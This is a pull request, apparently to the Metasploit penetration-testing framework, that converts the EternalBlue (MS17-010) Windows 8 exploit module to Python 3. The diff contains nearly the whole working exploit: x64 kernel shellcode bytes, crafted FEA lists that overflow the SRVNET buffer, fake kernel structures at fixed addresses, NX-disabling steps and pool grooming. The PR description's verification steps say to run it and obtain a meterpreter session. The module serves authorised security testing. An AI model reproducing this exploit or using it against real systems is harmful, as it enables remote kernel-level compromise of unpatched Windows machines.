### PR TITLE
Converts the external ms17_010_eternalblue_win8 to run only with Python3

### DIFF
--- a/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
@@ -117,7 +117,7 @@ def ror( dword, bits ):
 # nasm -f bin eternalblue_kshellcode_x64.asm -o eternalblue_kshellcode_x64.bin
 def eternalblue_kshellcode_x64(process="spoolsv.exe"):
     proc_hash = hash(process)
-
+    
     return (
     b'\x55\xe8\x2e\x00\x00\x00\xb9\x82\x00\x00\xc0\x0f\x32\x4c\x8d'+
     b'\x0d\x34\x00\x00\x00\x44\x39\xc8\x74\x19\x39\x45\x00\x74\x0a'+
@@ -141,7 +141,7 @@ def eternalblue_kshellcode_x64(process="spoolsv.exe"):
     b'\x00\x4c\x89\xc8\x4c\x29\xf0\x48\x3d\x00\x07\x00\x00\x77\xe6'+
     b'\x4d\x29\xce\xbf\xe1\x14\x01\x17\xe8\xbb\x00\x00\x00\x8b\x78'+
     b'\x03\x83\xc7\x08\x48\x8d\x34\x19\xe8\xf4\x00\x00\x00\x3d'+
-    proc_hash + b'\x74\x10\x3d' + proc_hash + b'\x74\x09\x48\x8b\x0c'+
+    bytes(proc_hash) + b'\x74\x10\x3d' + bytes(proc_hash) + b'\x74\x09\x48\x8b\x0c'+
     b'\x39\x48\x29\xf9\xeb\xe0\xbf\x48\xb8\x18\xb8\xe8\x84\x00\x00'+
     b'\x00\x48\x89\x45\xf0\x48\x8d\x34\x11\x48\x89\xf3\x48\x8b\x5b'+
     b'\x08\x48\x39\xde\x74\xf7\x4a\x8d\x14\x33\xbf\x3e\x4c\xf8\xce'+
@@ -418,7 +418,8 @@ def createSessionAllocNonPaged(target, port, size, username, password):
         pwd_unicode = conn.get_ntlmv1_response(ntlm.compute_nthash(password))
         # UnicodePasswordLen field is in Reserved for extended security format.
         sessionSetup['Parameters']['Reserved'] = len(pwd_unicode)
-        sessionSetup['Data'] = pack('<H', reqSize+len(pwd_unicode)+len(username)) + pwd_unicode + username + b'\x00'*16
+
+        sessionSetup['Data'] = pack('<H', reqSize+len(pwd_unicode)+len(username)) + pwd_unicode + username.encode() + b'\x00'*16
         pkt.addCommand(sessionSetup)
 
         conn.sendSMB(pkt)
@@ -462,7 +463,7 @@ def send_trans2_second(conn, tid, data, displacement):
     transCommand['Parameters']['TotalDataCount'] = len(data)
 
     fixedOffset = 32+3+18
-    transCommand['Data']['Pad1'] = ''
+    transCommand['Data']['Pad1'] = b''
 
     transCommand['Parameters']['ParameterCount'] = 0
     transCommand['Parameters']['ParameterOffset'] = 0
@@ -478,7 +479,7 @@ def send_trans2_second(conn, tid, data, displacement):
     transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len
     transCommand['Parameters']['DataDisplacement'] = displacement
 
-    transCommand['Data']['Trans_Parameters'] = ''
+    transCommand['Data']['Trans_Parameters'] = b''
     transCommand['Data']['Trans_Data'] = data
     pkt.addCommand(transCommand)
 
@@ -509,7 +510,7 @@ def send_big_trans2(conn, tid, setup, data, param, firstDataFragmentSize, sendLa
         padBytes = b'\xFF' * padLen
         transCommand['Data']['Pad1'] = padBytes
     else:
-        transCommand['Data']['Pad1'] = ''
+        transCommand['Data']['Pad1'] = b''
         padLen = 0
 
     transCommand['Parameters']['ParameterCount'] = len(param)
@@ -536,7 +537,7 @@ def send_big_trans2(conn, tid, setup, data, param, firstDataFragmentSize, sendLa
     else:
         module.log('got bad NT Trans response: 0x{:x}'.format(recvPkt.getNTStatus()), 'error')
         sys.exit(1)
-
+    
     # Then, use SMB_COM_TRANSACTION2_SECONDARY for send more data
     i = firstDataFragmentSize
     while i < len(data):
@@ -549,6 +550,7 @@ def send_big_trans2(conn, tid, setup, data, param, firstDataFragmentSize, sendLa
 
     if sendLastChunk:
         conn.recvSMB()
+
 
     return i
 
@@ -594,6 +596,7 @@ def _exploit(target, port, feaList, shellcode, numGroomConn, username, password)
     # The minimum requirement to trigger bug in SrvOs2FeaListSizeToNt() is SrvSmbOpen2() which is TRANS2_OPEN2 subcommand.
     # Send TRANS2_OPEN2 (0) with special feaList to a target except last fragment
     progress = send_big_trans2(conn, tid, 0, feaList, b'\x00'*30, len(feaList)%4096, False)
+    
 
     # Another TRANS2_OPEN2 (0) with special feaList for disabling NX
     nxconn = smb.SMB(target, target, sess_port = port)
@@ -678,12 +681,12 @@ def exploit(args):
     # XXX: Normalize strings to ints and unset options to empty strings
     rport = int(args['RPORT'])
     numGroomConn = int(args['GroomAllocations'])
-    smbuser = args['SMBUser'] if 'SMBUser' in args else ''
-    smbpass = args['SMBPass'] if 'SMBPass' in args else ''
-
+    smbuser = args['SMBUser'] if 'SMBUser' in args else b''
+    smbpass = args['SMBPass'] if 'SMBPass' in args else b''
+    
     # XXX: JSON-RPC requires UTF-8, so we Base64-encode the binary payload
     sc = eternalblue_kshellcode_x64(args['ProcessName']) + b64decode(args['payload_encoded'])
-
+    
     if len(sc) > 0xe80:
         module.log('Shellcode too long. The place that this exploit put a shellcode is limited to {} bytes.'.format(0xe80), 'error')
         sys.exit(1)

--- a/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
 
 import sys
 import socket
@@ -86,7 +86,7 @@ metadata = {
     'options': {
         'RHOST': {'type': 'address', 'description': 'Target server', 'required': True, 'default': None},
         'RPORT': {'type': 'port', 'description': 'Target server port', 'required': True, 'default': 445},
-        'ProcessName': {'type': 'string', 'description': 'Process to inject payload into.', 'required': False, 'default': 'spoolsv.exe'},        
+        'ProcessName': {'type': 'string', 'description': 'Process to inject payload into.', 'required': False, 'default': 'spoolsv.exe'},
         'GroomAllocations': {'type': 'int', 'description': 'Initial number of times to groom the kernel pool.', 'required': True, 'default': 13},
         # if anonymous can access any share folder, 'IPC$' is always accessible.
         # authenticated user is always able to access 'IPC$'.
@@ -101,8 +101,8 @@ metadata = {
 
 
 
-def hash(process):  
-    # calc_hash from eternalblue_kshellcode_x64.asm    
+def hash(process):
+    # calc_hash from eternalblue_kshellcode_x64.asm
     proc_hash = 0
     for c in str( process + "\x00" ):
         proc_hash  = ror( proc_hash, 13 )
@@ -117,67 +117,68 @@ def ror( dword, bits ):
 # nasm -f bin eternalblue_kshellcode_x64.asm -o eternalblue_kshellcode_x64.bin
 def eternalblue_kshellcode_x64(process="spoolsv.exe"):
     proc_hash = hash(process)
+
     return (
-    '\x55\xe8\x2e\x00\x00\x00\xb9\x82\x00\x00\xc0\x0f\x32\x4c\x8d'
-    '\x0d\x34\x00\x00\x00\x44\x39\xc8\x74\x19\x39\x45\x00\x74\x0a'
-    '\x89\x55\x04\x89\x45\x00\xc6\x45\xf8\x00\x49\x91\x50\x5a\x48'
-    '\xc1\xea\x20\x0f\x30\x5d\xc3\x48\x8d\x2d\x00\x10\x00\x00\x48'
-    '\xc1\xed\x0c\x48\xc1\xe5\x0c\x48\x83\xed\x70\xc3\x0f\x01\xf8'
-    '\x65\x48\x89\x24\x25\x10\x00\x00\x00\x65\x48\x8b\x24\x25\xa8'
-    '\x01\x00\x00\x6a\x2b\x65\xff\x34\x25\x10\x00\x00\x00\x50\x50'
-    '\x55\xe8\xc5\xff\xff\xff\x48\x8b\x45\x00\x48\x83\xc0\x1f\x48'
-    '\x89\x44\x24\x10\x51\x52\x41\x50\x41\x51\x41\x52\x41\x53\x31'
-    '\xc0\xb2\x01\xf0\x0f\xb0\x55\xf8\x75\x14\xb9\x82\x00\x00\xc0'
-    '\x8b\x45\x00\x8b\x55\x04\x0f\x30\xfb\xe8\x0e\x00\x00\x00\xfa'
-    '\x41\x5b\x41\x5a\x41\x59\x41\x58\x5a\x59\x5d\x58\xc3\x41\x57'
-    '\x41\x56\x57\x56\x53\x50\x4c\x8b\x7d\x00\x49\xc1\xef\x0c\x49'
-    '\xc1\xe7\x0c\x49\x81\xef\x00\x10\x00\x00\x66\x41\x81\x3f\x4d'
-    '\x5a\x75\xf1\x4c\x89\x7d\x08\x65\x4c\x8b\x34\x25\x88\x01\x00'
-    '\x00\xbf\x78\x7c\xf4\xdb\xe8\x01\x01\x00\x00\x48\x91\xbf\x3f'
-    '\x5f\x64\x77\xe8\xfc\x00\x00\x00\x8b\x40\x03\x89\xc3\x3d\x00'
-    '\x04\x00\x00\x72\x03\x83\xc0\x10\x48\x8d\x50\x28\x4c\x8d\x04'
-    '\x11\x4d\x89\xc1\x4d\x8b\x09\x4d\x39\xc8\x0f\x84\xc6\x00\x00'
-    '\x00\x4c\x89\xc8\x4c\x29\xf0\x48\x3d\x00\x07\x00\x00\x77\xe6'
-    '\x4d\x29\xce\xbf\xe1\x14\x01\x17\xe8\xbb\x00\x00\x00\x8b\x78'
-    '\x03\x83\xc7\x08\x48\x8d\x34\x19\xe8\xf4\x00\x00\x00\x3d' + proc_hash +
-    '\x74\x10\x3d' + proc_hash + '\x74\x09\x48\x8b\x0c' 
-    '\x39\x48\x29\xf9\xeb\xe0\xbf\x48\xb8\x18\xb8\xe8\x84\x00\x00'
-    '\x00\x48\x89\x45\xf0\x48\x8d\x34\x11\x48\x89\xf3\x48\x8b\x5b'
-    '\x08\x48\x39\xde\x74\xf7\x4a\x8d\x14\x33\xbf\x3e\x4c\xf8\xce'
-    '\xe8\x69\x00\x00\x00\x8b\x40\x03\x48\x83\x7c\x02\xf8\x00\x74'
-    '\xde\x48\x8d\x4d\x10\x4d\x31\xc0\x4c\x8d\x0d\xa9\x00\x00\x00'
-    '\x55\x6a\x01\x55\x41\x50\x48\x83\xec\x20\xbf\xc4\x5c\x19\x6d'
-    '\xe8\x35\x00\x00\x00\x48\x8d\x4d\x10\x4d\x31\xc9\xbf\x34\x46'
-    '\xcc\xaf\xe8\x24\x00\x00\x00\x48\x83\xc4\x40\x85\xc0\x74\xa3'
-    '\x48\x8b\x45\x20\x80\x78\x1a\x01\x74\x09\x48\x89\x00\x48\x89'
-    '\x40\x08\xeb\x90\x58\x5b\x5e\x5f\x41\x5e\x41\x5f\xc3\xe8\x02'
-    '\x00\x00\x00\xff\xe0\x53\x51\x56\x41\x8b\x47\x3c\x41\x8b\x84'
-    '\x07\x88\x00\x00\x00\x4c\x01\xf8\x50\x8b\x48\x18\x8b\x58\x20'
-    '\x4c\x01\xfb\xff\xc9\x8b\x34\x8b\x4c\x01\xfe\xe8\x1f\x00\x00'
-    '\x00\x39\xf8\x75\xef\x58\x8b\x58\x24\x4c\x01\xfb\x66\x8b\x0c'
-    '\x4b\x8b\x58\x1c\x4c\x01\xfb\x8b\x04\x8b\x4c\x01\xf8\x5e\x59'
-    '\x5b\xc3\x52\x31\xc0\x99\xac\xc1\xca\x0d\x01\xc2\x85\xc0\x75'
-    '\xf6\x92\x5a\xc3\x55\x53\x57\x56\x41\x57\x49\x8b\x28\x4c\x8b'
-    '\x7d\x08\x52\x5e\x4c\x89\xcb\x31\xc0\x44\x0f\x22\xc0\x48\x89'
-    '\x02\x89\xc1\x48\xf7\xd1\x49\x89\xc0\xb0\x40\x50\xc1\xe0\x06'
-    '\x50\x49\x89\x01\x48\x83\xec\x20\xbf\xea\x99\x6e\x57\xe8\x65'
-    '\xff\xff\xff\x48\x83\xc4\x30\x85\xc0\x75\x45\x48\x8b\x3e\x48'
-    '\x8d\x35\x4d\x00\x00\x00\xb9\x00\x06\x00\x00\xf3\xa4\x48\x8b'
-    '\x45\xf0\x48\x8b\x40\x18\x48\x8b\x40\x20\x48\x8b\x00\x66\x83'
-    '\x78\x48\x18\x75\xf6\x48\x8b\x50\x50\x81\x7a\x0c\x33\x00\x32'
-    '\x00\x75\xe9\x4c\x8b\x78\x20\xbf\x5e\x51\x5e\x83\xe8\x22\xff'
-    '\xff\xff\x48\x89\x03\x31\xc9\x88\x4d\xf8\xb1\x01\x44\x0f\x22'
-    '\xc1\x41\x5f\x5e\x5f\x5b\x5d\xc3\x48\x92\x31\xc9\x51\x51\x49'
-    '\x89\xc9\x4c\x8d\x05\x0d\x00\x00\x00\x89\xca\x48\x83\xec\x20'
-    '\xff\xd0\x48\x83\xc4\x30\xc3'
+    b'\x55\xe8\x2e\x00\x00\x00\xb9\x82\x00\x00\xc0\x0f\x32\x4c\x8d'+
+    b'\x0d\x34\x00\x00\x00\x44\x39\xc8\x74\x19\x39\x45\x00\x74\x0a'+
+    b'\x89\x55\x04\x89\x45\x00\xc6\x45\xf8\x00\x49\x91\x50\x5a\x48'+
+    b'\xc1\xea\x20\x0f\x30\x5d\xc3\x48\x8d\x2d\x00\x10\x00\x00\x48'+
+    b'\xc1\xed\x0c\x48\xc1\xe5\x0c\x48\x83\xed\x70\xc3\x0f\x01\xf8'+
+    b'\x65\x48\x89\x24\x25\x10\x00\x00\x00\x65\x48\x8b\x24\x25\xa8'+
+    b'\x01\x00\x00\x6a\x2b\x65\xff\x34\x25\x10\x00\x00\x00\x50\x50'+
+    b'\x55\xe8\xc5\xff\xff\xff\x48\x8b\x45\x00\x48\x83\xc0\x1f\x48'+
+    b'\x89\x44\x24\x10\x51\x52\x41\x50\x41\x51\x41\x52\x41\x53\x31'+
+    b'\xc0\xb2\x01\xf0\x0f\xb0\x55\xf8\x75\x14\xb9\x82\x00\x00\xc0'+
+    b'\x8b\x45\x00\x8b\x55\x04\x0f\x30\xfb\xe8\x0e\x00\x00\x00\xfa'+
+    b'\x41\x5b\x41\x5a\x41\x59\x41\x58\x5a\x59\x5d\x58\xc3\x41\x57'+
+    b'\x41\x56\x57\x56\x53\x50\x4c\x8b\x7d\x00\x49\xc1\xef\x0c\x49'+
+    b'\xc1\xe7\x0c\x49\x81\xef\x00\x10\x00\x00\x66\x41\x81\x3f\x4d'+
+    b'\x5a\x75\xf1\x4c\x89\x7d\x08\x65\x4c\x8b\x34\x25\x88\x01\x00'+
+    b'\x00\xbf\x78\x7c\xf4\xdb\xe8\x01\x01\x00\x00\x48\x91\xbf\x3f'+
+    b'\x5f\x64\x77\xe8\xfc\x00\x00\x00\x8b\x40\x03\x89\xc3\x3d\x00'+
+    b'\x04\x00\x00\x72\x03\x83\xc0\x10\x48\x8d\x50\x28\x4c\x8d\x04'+
+    b'\x11\x4d\x89\xc1\x4d\x8b\x09\x4d\x39\xc8\x0f\x84\xc6\x00\x00'+
+    b'\x00\x4c\x89\xc8\x4c\x29\xf0\x48\x3d\x00\x07\x00\x00\x77\xe6'+
+    b'\x4d\x29\xce\xbf\xe1\x14\x01\x17\xe8\xbb\x00\x00\x00\x8b\x78'+
+    b'\x03\x83\xc7\x08\x48\x8d\x34\x19\xe8\xf4\x00\x00\x00\x3d'+
+    proc_hash + b'\x74\x10\x3d' + proc_hash + b'\x74\x09\x48\x8b\x0c'+
+    b'\x39\x48\x29\xf9\xeb\xe0\xbf\x48\xb8\x18\xb8\xe8\x84\x00\x00'+
+    b'\x00\x48\x89\x45\xf0\x48\x8d\x34\x11\x48\x89\xf3\x48\x8b\x5b'+
+    b'\x08\x48\x39\xde\x74\xf7\x4a\x8d\x14\x33\xbf\x3e\x4c\xf8\xce'+
+    b'\xe8\x69\x00\x00\x00\x8b\x40\x03\x48\x83\x7c\x02\xf8\x00\x74'+
+    b'\xde\x48\x8d\x4d\x10\x4d\x31\xc0\x4c\x8d\x0d\xa9\x00\x00\x00'+
+    b'\x55\x6a\x01\x55\x41\x50\x48\x83\xec\x20\xbf\xc4\x5c\x19\x6d'+
+    b'\xe8\x35\x00\x00\x00\x48\x8d\x4d\x10\x4d\x31\xc9\xbf\x34\x46'+
+    b'\xcc\xaf\xe8\x24\x00\x00\x00\x48\x83\xc4\x40\x85\xc0\x74\xa3'+
+    b'\x48\x8b\x45\x20\x80\x78\x1a\x01\x74\x09\x48\x89\x00\x48\x89'+
+    b'\x40\x08\xeb\x90\x58\x5b\x5e\x5f\x41\x5e\x41\x5f\xc3\xe8\x02'+
+    b'\x00\x00\x00\xff\xe0\x53\x51\x56\x41\x8b\x47\x3c\x41\x8b\x84'+
+    b'\x07\x88\x00\x00\x00\x4c\x01\xf8\x50\x8b\x48\x18\x8b\x58\x20'+
+    b'\x4c\x01\xfb\xff\xc9\x8b\x34\x8b\x4c\x01\xfe\xe8\x1f\x00\x00'+
+    b'\x00\x39\xf8\x75\xef\x58\x8b\x58\x24\x4c\x01\xfb\x66\x8b\x0c'+
+    b'\x4b\x8b\x58\x1c\x4c\x01\xfb\x8b\x04\x8b\x4c\x01\xf8\x5e\x59'+
+    b'\x5b\xc3\x52\x31\xc0\x99\xac\xc1\xca\x0d\x01\xc2\x85\xc0\x75'+
+    b'\xf6\x92\x5a\xc3\x55\x53\x57\x56\x41\x57\x49\x8b\x28\x4c\x8b'+
+    b'\x7d\x08\x52\x5e\x4c\x89\xcb\x31\xc0\x44\x0f\x22\xc0\x48\x89'+
+    b'\x02\x89\xc1\x48\xf7\xd1\x49\x89\xc0\xb0\x40\x50\xc1\xe0\x06'+
+    b'\x50\x49\x89\x01\x48\x83\xec\x20\xbf\xea\x99\x6e\x57\xe8\x65'+
+    b'\xff\xff\xff\x48\x83\xc4\x30\x85\xc0\x75\x45\x48\x8b\x3e\x48'+
+    b'\x8d\x35\x4d\x00\x00\x00\xb9\x00\x06\x00\x00\xf3\xa4\x48\x8b'+
+    b'\x45\xf0\x48\x8b\x40\x18\x48\x8b\x40\x20\x48\x8b\x00\x66\x83'+
+    b'\x78\x48\x18\x75\xf6\x48\x8b\x50\x50\x81\x7a\x0c\x33\x00\x32'+
+    b'\x00\x75\xe9\x4c\x8b\x78\x20\xbf\x5e\x51\x5e\x83\xe8\x22\xff'+
+    b'\xff\xff\x48\x89\x03\x31\xc9\x88\x4d\xf8\xb1\x01\x44\x0f\x22'+
+    b'\xc1\x41\x5f\x5e\x5f\x5b\x5d\xc3\x48\x92\x31\xc9\x51\x51\x49'+
+    b'\x89\xc9\x4c\x8d\x05\x0d\x00\x00\x00\x89\xca\x48\x83\xec\x20'+
+    b'\xff\xd0\x48\x83\xc4\x30\xc3'
     )
 
 # because the srvnet buffer is changed dramatically from Windows 7, I have to choose NTFEA size to 0x9000
 NTFEA_SIZE = 0x9000
 
-ntfea9000 = (pack('<BBH', 0, 0, 0) + '\x00')*0x260  # with these fea, ntfea size is 0x1c80
-ntfea9000 += pack('<BBH', 0, 0, 0x735c) + '\x00'*0x735d  # 0x8fe8 - 0x1c80 - 0xc = 0x735c
-ntfea9000 += pack('<BBH', 0, 0, 0x8147) + '\x00'*0x8148  # overflow to SRVNET_BUFFER_HDR
+ntfea9000 = (pack('<BBH', 0, 0, 0) + b'\x00')*0x260  # with these fea, ntfea size is 0x1c80
+ntfea9000 += pack('<BBH', 0, 0, 0x735c) + b'\x00'*0x735d  # 0x8fe8 - 0x1c80 - 0xc = 0x735c
+ntfea9000 += pack('<BBH', 0, 0, 0x8147) + b'\x00'*0x8148  # overflow to SRVNET_BUFFER_HDR
 
 '''
 Reverse from srvnet.sys (Win2012 R2 x64)
@@ -268,15 +269,15 @@ TARGET_HAL_HEAP_ADDR = 0xffffffffffd04000  # for put fake struct and shellcode
 # MappedSystemVa = PTE_ADDR+7 - 0x7f
 SHELLCODE_PAGE_ADDR = (TARGET_HAL_HEAP_ADDR + 0x400) & 0xfffffffffffff000
 PTE_ADDR = 0xfffff6ffffffe800 + 8*((SHELLCODE_PAGE_ADDR-0xffffffffffd00000) >> 12)
-fakeSrvNetBufferX64Nx = '\x00'*16
+fakeSrvNetBufferX64Nx = b'\x00'*16
 fakeSrvNetBufferX64Nx += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR)
-fakeSrvNetBufferX64Nx += '\x00'*16
-fakeSrvNetBufferX64Nx += '\x00'*16
+fakeSrvNetBufferX64Nx += b'\x00'*16
+fakeSrvNetBufferX64Nx += b'\x00'*16
 fakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)
 fakeSrvNetBufferX64Nx += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR)  # _, _, pointer to fake struct
 fakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)
-fakeSrvNetBufferX64Nx += '\x00'*16
-fakeSrvNetBufferX64Nx += '\x00'*16
+fakeSrvNetBufferX64Nx += b'\x00'*16
+fakeSrvNetBufferX64Nx += b'\x00'*16
 fakeSrvNetBufferX64Nx += pack('<QHHI', 0, 0x60, 0x1004, 0)  # MDL.Next, MDL.Size, MDL.MdlFlags
 fakeSrvNetBufferX64Nx += pack('<QQ', 0, PTE_ADDR+7-0x7f)  # MDL.Process, MDL.MappedSystemVa
 
@@ -290,17 +291,18 @@ feaListNx += pack('<BBH', 0x12, 0x34, 0x5678)
 def createFakeSrvNetBuffer(sc_size):
     # 0x180 is size of fakeSrvNetBufferX64
     totalRecvSize = 0x80 + 0x180 + sc_size
-    fakeSrvNetBufferX64 = '\x00'*16
+    fakeSrvNetBufferX64 = b'\x00'*16
     fakeSrvNetBufferX64 += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR)  # flag, _, _, pNetRawBuffer
     fakeSrvNetBufferX64 += pack('<QII', 0, 0x82e8, 0)  # _, thisNonPagedPoolSize, _
-    fakeSrvNetBufferX64 += '\x00'*16
+    fakeSrvNetBufferX64 += b'\x00'*16
     fakeSrvNetBufferX64 += pack('<QQ', 0, totalRecvSize)  # offset 0x40
     fakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR, TARGET_HAL_HEAP_ADDR)  # pmdl2, pointer to fake struct
     fakeSrvNetBufferX64 += pack('<QQ', 0, 0)
-    fakeSrvNetBufferX64 += '\x00'*16
-    fakeSrvNetBufferX64 += '\x00'*16
+    fakeSrvNetBufferX64 += b'\x00'*16
+    fakeSrvNetBufferX64 += b'\x00'*16
     fakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0)  # MDL.Next, MDL.Size, MDL.MdlFlags
     fakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR-0x80)  # MDL.Process, MDL.MappedSystemVa
+
     return fakeSrvNetBufferX64
 
 def createFeaList(sc_size):
@@ -324,14 +326,14 @@ def createFeaList(sc_size):
 #
 # code path to get code exection after this struct is controlled
 # SrvNetWskTransformedReceiveComplete() -> SrvNetCommonReceiveHandler() -> call fn_ptr
-fake_recv_struct = ('\x00'*16)*5
+fake_recv_struct = (b'\x00'*16)*5
 fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x58)  # offset 0x50: KSPIN_LOCK, (LIST_ENTRY to itself)
 fake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x58, 0)  # offset 0x60
-fake_recv_struct += ('\x00'*16)*10
+fake_recv_struct += (b'\x00'*16)*10
 fake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x170, 0)  # offset 0x110: fn_ptr array
 fake_recv_struct += pack('<QQ', (0x8150^0xffffffffffffffff)+1, 0)  # set arg1 to -0x8150
 fake_recv_struct += pack('<QII', 0, 0, 3)  # offset 0x130
-fake_recv_struct += ('\x00'*16)*3
+fake_recv_struct += (b'\x00'*16)*3
 fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x180)  # shellcode address
 
 
@@ -394,7 +396,7 @@ def createSessionAllocNonPaged(target, port, size, username, password):
     sessionSetup['Parameters']['SecurityBlobLength'] = 0  # this is OEMPasswordLen field in another format. 0 for NULL session
     sessionSetup['Parameters']['Capabilities']       = smb.SMB.CAP_EXTENDED_SECURITY | smb.SMB.CAP_USE_NT_ERRORS
 
-    sessionSetup['Data'] = pack('<H', reqSize) + '\x00'*20
+    sessionSetup['Data'] = pack('<H', reqSize) + b'\x00'*20
     pkt.addCommand(sessionSetup)
 
     conn.sendSMB(pkt)
@@ -416,7 +418,7 @@ def createSessionAllocNonPaged(target, port, size, username, password):
         pwd_unicode = conn.get_ntlmv1_response(ntlm.compute_nthash(password))
         # UnicodePasswordLen field is in Reserved for extended security format.
         sessionSetup['Parameters']['Reserved'] = len(pwd_unicode)
-        sessionSetup['Data'] = pack('<H', reqSize+len(pwd_unicode)+len(username)) + pwd_unicode + username + '\x00'*16
+        sessionSetup['Data'] = pack('<H', reqSize+len(pwd_unicode)+len(username)) + pwd_unicode + username + b'\x00'*16
         pkt.addCommand(sessionSetup)
 
         conn.sendSMB(pkt)
@@ -467,9 +469,9 @@ def send_trans2_second(conn, tid, data, displacement):
 
     if len(data) > 0:
         pad2Len = (4 - fixedOffset % 4) % 4
-        transCommand['Data']['Pad2'] = '\xFF' * pad2Len
+        transCommand['Data']['Pad2'] = b'\xFF' * pad2Len
     else:
-        transCommand['Data']['Pad2'] = ''
+        transCommand['Data']['Pad2'] = b''
         pad2Len = 0
 
     transCommand['Parameters']['DataCount'] = len(data)
@@ -504,7 +506,7 @@ def send_big_trans2(conn, tid, setup, data, param, firstDataFragmentSize, sendLa
     fixedOffset = 32+3+38 + len(command)
     if len(param) > 0:
         padLen = (4 - fixedOffset % 4 ) % 4
-        padBytes = '\xFF' * padLen
+        padBytes = b'\xFF' * padLen
         transCommand['Data']['Pad1'] = padBytes
     else:
         transCommand['Data']['Pad1'] = ''
@@ -515,9 +517,9 @@ def send_big_trans2(conn, tid, setup, data, param, firstDataFragmentSize, sendLa
 
     if len(data) > 0:
         pad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4
-        transCommand['Data']['Pad2'] = '\xFF' * pad2Len
+        transCommand['Data']['Pad2'] = b'\xFF' * pad2Len
     else:
-        transCommand['Data']['Pad2'] = ''
+        transCommand['Data']['Pad2'] = b''
         pad2Len = 0
 
     transCommand['Parameters']['DataCount'] = firstDataFragmentSize
@@ -547,6 +549,7 @@ def send_big_trans2(conn, tid, setup, data, param, firstDataFragmentSize, sendLa
 
     if sendLastChunk:
         conn.recvSMB()
+
     return i
 
 
@@ -554,19 +557,19 @@ def send_big_trans2(conn, tid, setup, data, param, firstDataFragmentSize, sendLa
 # this method is for allocating big nonpaged pool on target
 def createConnectionWithBigSMBFirst80(target, port, for_nx=False):
     sk = socket.create_connection((target, port))
-    pkt = '\x00' + '\x00' + pack('>H', 0x8100)
+    pkt = b'\x00' + b'\x00' + pack('>H', 0x8100)
     # There is no need to be SMB2 because we want the target free the corrupted buffer.
     # Also this is invalid SMB2 message.
     # I believe NSA exploit use SMB2 for hiding alert from IDS
     #pkt += '\xfeSMB' # smb2
     # it can be anything even it is invalid
-    pkt += 'BAAD' # can be any
+    pkt += b'BAAD' # can be any
     if for_nx:
         # MUST set no delay because 1 byte MUST be sent immediately
         sk.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
-        pkt += '\x00'*0x7b  # another byte will be sent later to disabling NX
+        pkt += b'\x00'*0x7b  # another byte will be sent later to disabling NX
     else:
-        pkt += '\x00'*0x7c
+        pkt += b'\x00'*0x7c
     sk.send(pkt)
     return sk
 
@@ -590,13 +593,13 @@ def _exploit(target, port, feaList, shellcode, numGroomConn, username, password)
 
     # The minimum requirement to trigger bug in SrvOs2FeaListSizeToNt() is SrvSmbOpen2() which is TRANS2_OPEN2 subcommand.
     # Send TRANS2_OPEN2 (0) with special feaList to a target except last fragment
-    progress = send_big_trans2(conn, tid, 0, feaList, '\x00'*30, len(feaList)%4096, False)
+    progress = send_big_trans2(conn, tid, 0, feaList, b'\x00'*30, len(feaList)%4096, False)
 
     # Another TRANS2_OPEN2 (0) with special feaList for disabling NX
     nxconn = smb.SMB(target, target, sess_port = port)
     nxconn.login(username, password)
     nxtid = nxconn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
-    nxprogress = send_big_trans2(nxconn, nxtid, 0, feaListNx, '\x00'*30, len(feaList)%4096, False)
+    nxprogress = send_big_trans2(nxconn, nxtid, 0, feaListNx, b'\x00'*30, len(feaList)%4096, False)
 
     # create some big buffer at server
     # this buffer MUST NOT be big enough for overflown buffer
@@ -637,7 +640,7 @@ def _exploit(target, port, feaList, shellcode, numGroomConn, username, password)
     # one of srvnetConn struct header should be modified
     # send '\x00' to disable nx
     for sk in srvnetConn:
-        sk.send('\x00')
+        sk.send(b'\x00')
 
     # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header
     # second trigger, place fake struct and shellcode


### PR DESCRIPTION
Closes https://github.com/rapid7/metasploit-framework/issues/13478

This PR changes the `ms17_010_eternalblue_win8.py` external module to run only with python3, and makes the necessary changes to the strings in the exploit to ensure shellcode is generated successfully. One of the main differences between Python2 & Python3 is that in python2, strings are stored as bytes, where as in python3, they are stored as unicode strings:
![image](https://user-images.githubusercontent.com/54621924/99803207-f3953a80-2b30-11eb-8d4c-424f708931d3.png)

This means that any shellcode that needs to be stored as bytes before being sent to the victim machine has to be explicitly set as a byte string with `b'<shellcode>'`. 

## Verification

- [ ] Start `msfconsole`
- [ ] `use windows/smb/ms17_010_eternalblue_win8`
- [ ] `run`
- [ ] **Verify** the module can successfully create a `meterpreter` session
- [ ] **Verify** the module can successfully execute another payload (IE `payload/cmd/windows/generic`) 

Big thanks to @kal1s for his detailed post on the issue.